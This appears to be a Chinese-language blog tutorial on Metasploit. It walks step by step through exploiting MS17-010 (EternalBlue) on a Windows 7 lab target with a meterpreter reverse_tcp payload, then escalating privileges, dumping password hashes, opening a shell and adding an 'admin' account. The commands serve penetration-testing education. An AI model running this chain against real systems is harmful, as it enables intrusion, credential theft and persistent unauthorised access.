本文内容:
~认识MSF和永恒之蓝
~MSF的基础命令
~漏洞利用基本流程
~实战漏洞利用
额外说明:
这篇文章,仅仅作为扩展,大家了解一下MSF(美少妇)
一、认识MSF和永恒之蓝
1,定义
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、
开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的
专业级漏洞攻击工具
我们能够通过它发现漏洞并进行快速实施攻击(需要在授权的情况下!)
//这款“美少妇”工具kali自带
2,使用
第一次使用MSF,
开启数据库:service postgresql start
初始化msf数据库: msfdb init
开启MSF: msfconsole
注意:
~这是初始化msf的默认数据库,不然运行会比较慢
以后再使用的话,就直接开启msf即可
~MSF的启动漫画是随机的
二、MSF的基础命令
1,msf5的五大模块
~auxiliary 辅助模块
为渗透测试信息搜集提供了大量的辅助模块支持
命名规则:
操作系统/服务/名称
windows/smb/ms17_010_eternalblue
~Exploits 攻击模块
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,
从而获得对远程目标系统访问权的代码组件。
~Payload 攻击载荷模块
攻击成功后促使靶机运行的一段植入代码
命名规则:
操作系统/类型/名称
windows/x64/meterpreter/reverse_tcp
~Post 后渗透攻击模块
收集更多信息或进一步访问被利用的目标系统
~Encoders 编码模块
将攻击载荷进行编码,来绕过防护软件拦截
2,常用命令
~help/? 帮助菜单
~exit 退出msf
~Back 返回
~show 显示所给类型的模块
例如:show auxiliary //查看辅助模块
补充:
~rank表示好用级别:
normal(正常),
excellent(优秀),
good(良好),
average(平均)
~数字
代表一种作用,可以直接用前边数字调用
~info 显示一个或者多个模块的信息
例如: info windows/smb/ms17_010_eternalblue
~search 寻找
例如:search ms17
~更新MSF:apt-get install metasploit-framework
三、漏洞利用基本流程
扫描靶机
use auxiliary/scanner/smb/smb_ms17_010 //使用辅助模块
进入此模块,输入options,
在这个下,我们可以看看我们需要设置哪些参数
( Required栏为“yes”的参数,要不是系统已经设置好的
要不就是需要我们设置的 )
例如 :我们设置rhosts, set rhosts 192.168.221.129
选择exploit
之后出现的结果,前边出现绿色的“[+]”且后边出现我们的目标IP
就说明我们可以进行攻击
back 返回上一级
use exploit/windows/smb/ms17_010_eternalblue
option看一下
set rhosts 192.168.221.129
选择payload
set payload windows/x64/meterpreter/reverse_tcp
options看一下(因为payload也需要设置配置)
set lhosts 192.168.221.133 //lhosts是本机IP
// 设置之后,
我们之前打进去的木马,就会来找我们的IP
攻击 exploit
提权 getsystem
枚举密码 hashdump //一般密码都是加密的
去拿个shell shell
查看权限 whoami
在尝试添加一个账户
net user admin admin /add
在看看所有用户 net user
//本次攻击靶机是win 7 sp1 //win 7 企业版
四、实战漏洞利用
1,正反向连接
~正向连接 : 我们去连接木马
~反向连接 : 木马来连接我们 //这个更稳定一些,且不太容易被拦截
2,不熟悉的话,多练习几遍
3,提权的原理
对面(目标)运行的一些程序具有高权限,
我们利用这个进程执行一些命令,以达到我么的目的
iis6.0de提权 建议百度一下